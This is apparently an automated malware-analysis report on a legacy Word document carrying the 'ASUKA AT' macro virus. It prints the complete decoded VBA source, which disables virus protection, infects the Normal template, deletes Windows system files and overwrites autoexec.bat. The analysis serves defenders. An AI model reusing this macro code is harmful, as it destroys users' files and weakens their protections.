Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 11b1906902c393ab…

MALICIOUS

Office (OLE)

30.5 KB Created: 1999-06-03 06:13:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: a264daabcc2d83519eb3f4e64be9a15e SHA-1: aa505cae199ae9bd5345a17237303d0236193c62 SHA-256: 11b1906902c393ab74129993aefb026b7bf1cd969c215d108b909e758da8cfa1
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, indicating it's designed to execute automatically when the document is opened. The macro attempts to disable virus protection and create a malicious 'c:\autoexec.bat' file, which would execute the 'ASUKA AT' payload. This suggests a classic macro-based malware delivery mechanism.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3203 bytes
SHA-256: 31e73b283619827e9b0b519dc0d5d8f525cdcc8ca5aaee71bc784db0708a68e6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Módulo1"
Private Declare Function Donde_esta_Windowsdirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Sub AutoOpen()
Options.VirusProtection = False
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
ShowVisualBasicEditor = False
Dim DirName As String
Dim Shinji As String
    DirName = Donde_esta_Windows()
    Shinji = DirName
On Error GoTo RutinaDeError
ActiveDocument.SaveAs FileName:=NormalTemplate.Path & "\" & NormalTemplate.Name, FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Kill (Shinji + "command.com")
Kill (Shinji + "winfile.exe")
Kill (Shinji + "\system\appwiz.cpl")
Kill (Shinji + "\system\sysdm.cpl")
'aca van los archivos: c:\windows\explorer.exe, c:\windows\winfile.exe, c:\windows\command.com, c:\windows\system\appwiz.cpl, c:\windows\system\sysdm.cpl, acuerdate de poner Shinji
Open "c:\autoexec.bat" For Output As #1
Print #1, "@echo off"
Print #1, "cls"
Print #1, "ECHO          *********************************************************"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                    ViRuS: ASUKA AT                    *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                         AUTOR:                        *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                  ©©©© ZaHACKieL  ©©©©                 *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                      LIMA - PERU                      *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                       03/JUN/00                       *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                     ®®®®®®®®®®®®®®                    *"
Print #1, "ECHO          *                     §            §                    *"
Print #1, "ECHO          *                     §   A.B.G    §                    *"
Print #1, "ECHO          *********************************************************"
Print #1, "pause"
Close #1
Application.Visible = False
RutinaDeError:
Exit Sub
End Sub

Function Donde_esta_Windows() As String
    Dim Temp As String
    Dim Ret As Long
    Const MAX_LENGTH = 145

    Temp = String$(MAX_LENGTH, 0)
    Ret = Donde_esta_Windowsdirectory(Temp, MAX_LENGTH)
    Temp = Left$(Temp, Ret)
    If Temp <> "" And Right$(Temp, 1) <> "\" Then
        Donde_esta_Windows = Temp & "\"
    Else
        Donde_esta_Windows = Temp
    End If
End Function